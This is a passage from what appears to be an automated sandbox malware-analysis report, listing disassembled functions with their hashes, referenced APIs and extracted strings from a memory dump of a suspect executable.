Instruction Fuzzy Hash: 5890027120150402E1007598940864A000997E0301F55D012A9424555EC66589916231

Function 01052CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43dfbd215f82910b6a81b6b7b43104bee9c5fb4db29198806d823be899557886
Instruction ID: 165d90c98da7cd53e1f9b7b04287567fb3d1dc7b98cb71757ce8a5eece7de9d4
Opcode Fuzzy Hash: 43dfbd215f82910b6a81b6b7b43104bee9c5fb4db29198806d823be899557886
Instruction Fuzzy Hash: 4D90027160550402E1407158941870A001997D0201F55D012A4424554DC6598B5567A1

Function 01052CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adf5925aba5ca4b47737f65dca575a5d88b8cd69899290afe4fc49261bd5c98c
Instruction ID: 41729aca381e3563af6e51dfeaf5b5accb9c53335cfd510ab3a2ac2c2d965283
Opcode Fuzzy Hash: adf5925aba5ca4b47737f65dca575a5d88b8cd69899290afe4fc49261bd5c98c
Instruction Fuzzy Hash: 1A90027120150403E1007158950870B000997D0201F55D412A4824558DD65689516221

Function 01052F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f2f46f0f8308a8868351e7c734fddbbe0cb7e336142399aefa5d69b5727b1b9
Instruction ID: 7fca6659b367a6ee7446366eb1f76f5e7adb3d14f7d847c53a947cbfff056f35
Opcode Fuzzy Hash: 3f2f46f0f8308a8868351e7c734fddbbe0cb7e336142399aefa5d69b5727b1b9
Instruction Fuzzy Hash: 029002B134150442E10071588414B0A0009D7E1301F55C016E5464554DC619CD526226

Function 01052F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca758f27dedf2bce72fdb0c57be8c69368094b2098cd4ecad12c809c80403b1
Instruction ID: 03a2359c513e1a26bd47f21447d2f41f7fb50863fdfafa01b92e3e9553544ace
Opcode Fuzzy Hash: 0ca758f27dedf2bce72fdb0c57be8c69368094b2098cd4ecad12c809c80403b1
Instruction Fuzzy Hash: 7B9002B121150042E1047158840470A004997E1201F55C013A6554554CC5298D615225

Function 01052F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0bdb6e9b4bd7b32bc08dfe5ebfc9fdc5a9ef3f495b37e0e4a1f9de5a1e7b295
Instruction ID: 5b8b03bc78adfb338b2b8f19f8f0b6b6e83363296fa40ef6995472154d5ab60f
Opcode Fuzzy Hash: e0bdb6e9b4bd7b32bc08dfe5ebfc9fdc5a9ef3f495b37e0e4a1f9de5a1e7b295
Instruction Fuzzy Hash: 7E90027120190402E1007158881470F000997D0302F55C012A5564555DC62589516671

Function 01052FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df1b110b4839e9bd82ccd43e9a22a3e64b1acb6cfa18977f56c89ae0ec9fd395
Instruction ID: c7c418eb369f1be9c41a72909f4c1c00ab4abbb7796749fd2b5f54e52109f4ec
Opcode Fuzzy Hash: df1b110b4839e9bd82ccd43e9a22a3e64b1acb6cfa18977f56c89ae0ec9fd395
Instruction Fuzzy Hash: F090027120190402E1007158880874B000997D0302F55C012A9564555EC665C9916631

Function 01052FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ebb583bf2edbb2f843a71de5a43c9878127d58d79ae3d27cb5d8949d324b344
Instruction ID: f9cc133bee22df821f5fe74c7adcaf13b401ff4068c14c5eea3df5142f20af33
Opcode Fuzzy Hash: 5ebb583bf2edbb2f843a71de5a43c9878127d58d79ae3d27cb5d8949d324b344
Instruction Fuzzy Hash: 969002716015004251407168C84490A4009BBE1211755C122A4D98550DC55989655765

Function 01052FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a387aaed75821d8411c6bf5f842091c66321bd5438ed3fecc0977fc6bd73e4ea
Instruction ID: 46afabbbffa8542952ca8e7d48c98e42504b47ceb1c3fba4b2100e1b7120d6f7
Opcode Fuzzy Hash: a387aaed75821d8411c6bf5f842091c66321bd5438ed3fecc0977fc6bd73e4ea
Instruction Fuzzy Hash: 40900271211D0042E20075688C14B0B000997D0303F55C116A4554554CC91589615621

Function 01052E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c3151198b4effa99f9213012c697708e22340aeee2a85502b194e34ae3afbc9
Instruction ID: a7683768bb6a9006238237fea279f17c8d2b173909ccd7f03289016a8e7f6731
Opcode Fuzzy Hash: 0c3151198b4effa99f9213012c697708e22340aeee2a85502b194e34ae3afbc9
Instruction Fuzzy Hash: 4990027130150402E1027158841460A000DD7D1345F95C013E5824555DC6258A53A232

Function 01052E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a630ac4a34efef23ece344c20bf39a9a8300336eae05392d64cbaa5082ba0651
Instruction ID: 67defe485e706a8be5cfe6c3743a9dc48abb3f2a56e881539c8ca8ec5890096b
Opcode Fuzzy Hash: a630ac4a34efef23ece344c20bf39a9a8300336eae05392d64cbaa5082ba0651
Instruction Fuzzy Hash: 2990027160150502E1017158840461A000E97D0241F95C023A5424555ECA258A92A231

Function 01052EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c2c0a9139429adfb9012ed64c69cafe6465142fd632dd9d8ed238e24f6cf5d7
Instruction ID: 3a8eb4c79a72fc923214b51eb8c9e02ccbef891ea48c89688a234ffd6993b09c
Opcode Fuzzy Hash: 2c2c0a9139429adfb9012ed64c69cafe6465142fd632dd9d8ed238e24f6cf5d7
Instruction Fuzzy Hash: 089002B120150402E1407158840474A000997D0301F55C012A9464554EC6598ED56765

Function 01052EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f0adc25d6d5501b67c803add2d62a027acd6202f9bfea567368218ddd8654c1
Instruction ID: 9bc7cc828c9897d2d202e2d6c0432172489709acd94cdba94e1ec14d2461d329
Opcode Fuzzy Hash: 3f0adc25d6d5501b67c803add2d62a027acd6202f9bfea567368218ddd8654c1
Instruction Fuzzy Hash: D69002B120190403E1407558880460B000997D0302F55C012A6464555ECA298D516235

Function 01053010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d32df696e8c8b778cb6844151e6b4bc4ce7c25fedeae519a9193adfb6a4b6ea8
Instruction ID: 9ae46e4e97adf0c2a2cf1ce69be1ac62e425e2485f603d773107359479de9b16
Opcode Fuzzy Hash: d32df696e8c8b778cb6844151e6b4bc4ce7c25fedeae519a9193adfb6a4b6ea8
Instruction Fuzzy Hash: 6E90027120194442E14072588804B0F410997E1202F95C01AA8556554CC91589555721

Function 01053090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf251966f604eb8e92cbff55e1db0a6d9f61425042e42a2aa20e4998eee3b785
Instruction ID: d01ae65ae63c6af6ac77a8f10d2bcb7ac44112c97359fbdf21f24afa14b53bed
Opcode Fuzzy Hash: bf251966f604eb8e92cbff55e1db0a6d9f61425042e42a2aa20e4998eee3b785
Instruction Fuzzy Hash: CD90027124150802E1407158C41470B000AD7D0601F55C012A4424554DC6168A6567B1

Function 010539B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcca58dd4867f52920c7683302518a905a8af1813c21552ccea3519418ab9d25
Instruction ID: c0fb05640975eecfda7fc1c159ca0f7bd7e636ba113a0a80ff3b7d7d17b5cc1c
Opcode Fuzzy Hash: bcca58dd4867f52920c7683302518a905a8af1813c21552ccea3519418ab9d25
Instruction Fuzzy Hash: AB90027124555102E150715C840461A4009B7E0201F55C022A4C14594DC55589556321

Function 01053D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd64848e173b5c8ca6b1f296cb995fd0299dfe218a1b7aee9ea3909155d388c7
Instruction ID: 1a009a256bdf55b55a4032c4a797d773b03a9db1c56c5083040b545c4b78e7d4
Opcode Fuzzy Hash: cd64848e173b5c8ca6b1f296cb995fd0299dfe218a1b7aee9ea3909155d388c7
Instruction Fuzzy Hash: 4590027120250142A54072589804A4E410997E1302B95D416A4415554CC91489615321

Function 01053D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab98c497880f20fdf507b249eefee18aac7a3e331b8ba6352760e10a94d4be23
Instruction ID: 2b118a78b96e040527f6c032fe57d9f486026a0916d23c2f0e070ef2680a8dbe
Opcode Fuzzy Hash: ab98c497880f20fdf507b249eefee18aac7a3e331b8ba6352760e10a94d4be23
Instruction Fuzzy Hash: F590027520150402E5107158980464A004A97D0301F55D412A4824558DC65489A1A221

Function 01052C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 3e2ddbdefb5aa0b57140d7b0c123a94501964644292d3249d70f367482ffad41
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01052890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0105293C
___swprintf_l.LIBCMT ref: 0105295E
___swprintf_l.LIBCMT ref: 010529A3
___swprintf_l.LIBCMT ref: 0108A52E

Strings

:%u.%u.%u.%u, xrefs: 0108A5B8
ffff:, xrefs: 0108A504
::%hs%u.%u.%u.%u, xrefs: 0108A527
::ffff:0:%u.%u.%u.%u, xrefs: 0108A54E

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: fbceef533d96b5961c919fe22241f5c8683d2c17de1d921c97dd31d454a45974
Instruction ID: 0a2599ca3d280801e8494a088ba5bddecf481767e5b86a5b93612f4e820edf82
Opcode Fuzzy Hash: fbceef533d96b5961c919fe22241f5c8683d2c17de1d921c97dd31d454a45974
Instruction Fuzzy Hash: 3951C5B5A04156FEDB61DB9C899097FFBF8BF08240B14816AF8E5D7641D334DE408BA0

Function 010C2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 010C24A6
___swprintf_l.LIBCMT ref: 010C24E2
___swprintf_l.LIBCMT ref: 010C257D
___swprintf_l.LIBCMT ref: 010C25A3
___swprintf_l.LIBCMT ref: 010C25C8
___swprintf_l.LIBCMT ref: 010C2608

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 010C24DA
ffff:, xrefs: 010C247D, 010C249D
::%hs%u.%u.%u.%u, xrefs: 010C249E
:%u.%u.%u.%u, xrefs: 010C25FF

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 240a5dfcdc3c0954ff228d9115e54da4c79f2ba40ecc57db69c425c607fe69ee
Instruction ID: 589714183ab9518764b3953240c9fa6b079dcc0baa3b78d5beccd7f24751f0c8
Opcode Fuzzy Hash: 240a5dfcdc3c0954ff228d9115e54da4c79f2ba40ecc57db69c425c607fe69ee
Instruction Fuzzy Hash: 0E511671A00646AFDB31DF5CC89097FFBF8EF54600B04849EE4D6C7A81EA74DA408B60

Function 01047630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 01084713
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010846FC
CLIENT(ntdll): Processing section info %ws..., xrefs: 01084787
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01084655
ExecuteOptions, xrefs: 010846A0
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01084725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01084742

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 840e4efc46e9cb8247ece8e5ae029ac872e38bd99b8cece7ff85620e680d99e7
Instruction ID: 780569b5fd0f5df4330dd84bf42aed6fab844786909fe9ceba9efe0a55c03e98
Opcode Fuzzy Hash: 840e4efc46e9cb8247ece8e5ae029ac872e38bd99b8cece7ff85620e680d99e7
Instruction Fuzzy Hash: E951197160021AABEF21EAA8DCD5BEE7BA9FF18300F4400F9D685E7191D7709A458B51

Function 010E6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: bf33135e4bccb559f28d0a100c8b71e4c1723d5cd6506285d986f0ff18f67f49
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 1F024671608342AFD349CF19D498A6FBBE5EFD8700F44896DF9854B260DB32E944CB82

Function 0105B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0105B6BF

Strings

0, xrefs: 0105B66F
-, xrefs: 0105B650
+, xrefs: 0105B65A
0, xrefs: 0105B695

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: d3ee3652ce7fee8a29063ce5a16d0b72b868d7cbd5946a53e43803930f9d0269
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 7181AF70A052499EEFA58E6CC8917FFBBE3BF45320F184199DCE1A7291C734A941CB61

Function 010C20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 010C214F
___swprintf_l.LIBCMT ref: 010C2172

Strings

%%%u, xrefs: 010C2146
[, xrefs: 010C212B
]:%u, xrefs: 010C2169

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 95b695dfa1d46c7b56c2e7d4746fb02ff7a1cf21f8784ac60a5c672498d4b734
Instruction ID: 572b99df5dc43cc6ab6ca9874adf24f61dd9b76e7c4ea39a16b5471bb8c9549e
Opcode Fuzzy Hash: 95b695dfa1d46c7b56c2e7d4746fb02ff7a1cf21f8784ac60a5c672498d4b734
Instruction Fuzzy Hash: 6021657AA00119ABDB51DF79CC50AFE7BF8EFA4A44F04016AED85D7640E730D9418BA1

Function 0103F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0108031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010802BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010802E7

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 53734ad1d0e546a46334849a58034d2e9ae1f454071d4e032b813baebdae969c
Instruction ID: 53f5e7970a479f3a71f7034641deab5d4e688987786d0a6b73dabf26c02a3c69
Opcode Fuzzy Hash: 53734ad1d0e546a46334849a58034d2e9ae1f454071d4e032b813baebdae969c
Instruction Fuzzy Hash: E9E19F30A087429FD765DF28C884B6ABBE4BB88314F144A99F5E58B2E1D774D845CB42

Function 0104BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 01087B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01087B7F
RTL: Re-Waiting, xrefs: 01087BAC

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 1938398437a61d8de83323b5e3efccd64a47df165cd1c0d12066cae665f5bd63
Instruction ID: 15f0480d8d1299f8733e6cec6dea0b263a4d9239e5b0a066d4b7c64b498b4816
Opcode Fuzzy Hash: 1938398437a61d8de83323b5e3efccd64a47df165cd1c0d12066cae665f5bd63
Instruction Fuzzy Hash: 0D41F4717047029FD720DE29C880B6BB7E5EF98710F100A6DFADAD7281DB72E8058B91

Function 0104B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0108728C

Strings

RTL: Resource at %p, xrefs: 010872A3
RTL: Re-Waiting, xrefs: 010872C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01087294

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 5b19a2441096f3c7cf7cf7ca183a98b5d175f4f6d3a03ff69c586f785023b0c6
Instruction ID: 4152c02b3b06797a4af43f8c6a6d37c01bafd26e723b4fd119ba9e04d2ef2f88
Opcode Fuzzy Hash: 5b19a2441096f3c7cf7cf7ca183a98b5d175f4f6d3a03ff69c586f785023b0c6
Instruction Fuzzy Hash: F241E571704206ABDB21EE29CC81B6ABBE5FF94710F200669F9D5D7280DB31E852C7D1

Function 010C2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 010C238D
___swprintf_l.LIBCMT ref: 010C23B3

Strings

]:%u, xrefs: 010C23AA
%%%u, xrefs: 010C2384

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: e761b19a0697b0175db516553d0f3b7ac6e21c7ec63aa112cc952a867d03bb55
Instruction ID: 5e5750b860671e0c3026799540258f902eed41b70748a5da6cc9002b0dff9f69
Opcode Fuzzy Hash: e761b19a0697b0175db516553d0f3b7ac6e21c7ec63aa112cc952a867d03bb55
Instruction Fuzzy Hash: 97316672A002199FDB61DF2DCC40BEFB7F8FB54610F45459AE989E7240EB309A548FA0

Function 01057D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01057E8B

Strings

-, xrefs: 01057DDD
+, xrefs: 01057DE8

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 83388e941ce02e613d8def00e68f4174c4833f46683990b6d92e5ede3cdda96a
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 5591A071E0021A9AEFE4DF6DC880ABFBBE5EF44320F94455AED95A72C0D7308940A761

Function 01019126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 01019191
@, xrefs: 01019175

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 7ba233cf00ee4fd0bc57f80aa78ca07222cae8f3ebadaac9e60dfe3291b772de
Instruction ID: 33b77a8b16bcc11ba5938c5049fbc788d818ece7601bca2d86ff0a84972e0eed
Opcode Fuzzy Hash: 7ba233cf00ee4fd0bc57f80aa78ca07222cae8f3ebadaac9e60dfe3291b772de
Instruction Fuzzy Hash: 51812C71D002699BDB35DB54CC44BEEB7B8AF48754F0041EAEA59B7280D7709E84CFA4

Analysis Process: GxqFOvQfqyr.exePID: 2296, Parent PID: 4816COMMON

Executed Functions

Function 03203F6C Relevance: 39.3, Strings: 31, Instructions: 536COMMON

Download Yara Rule

Strings

[P, xrefs: 0320432C
{, xrefs: 032041E4
[>, xrefs: 03204311
#, xrefs: 03204076
q, xrefs: 03204109
0c, xrefs: 032043B6
XE, xrefs: 032043D4
@m, xrefs: 03204127
E%, xrefs: 032040EE
], xrefs: 032040C6
v, xrefs: 03204192
2., xrefs: 032040D0
X, xrefs: 03204131
J6, xrefs: 03203FB2
i, xrefs: 032042C2
_, xrefs: 032041DA
xl, xrefs: 032043C0
@ , xrefs: 03203F80
\7, xrefs: 03204278
wn, xrefs: 03204398
S, xrefs: 0320420C
&x, xrefs: 032043CA
"A, xrefs: 03204032
?W, xrefs: 0320425C
6&, xrefs: 03204068
_, xrefs: 03204227
D, xrefs: 03203FF2
"R, xrefs: 032046CC
[>, xrefs: 03204900
X, xrefs: 0320417E
4, xrefs: 0320429A

Memory Dump Source

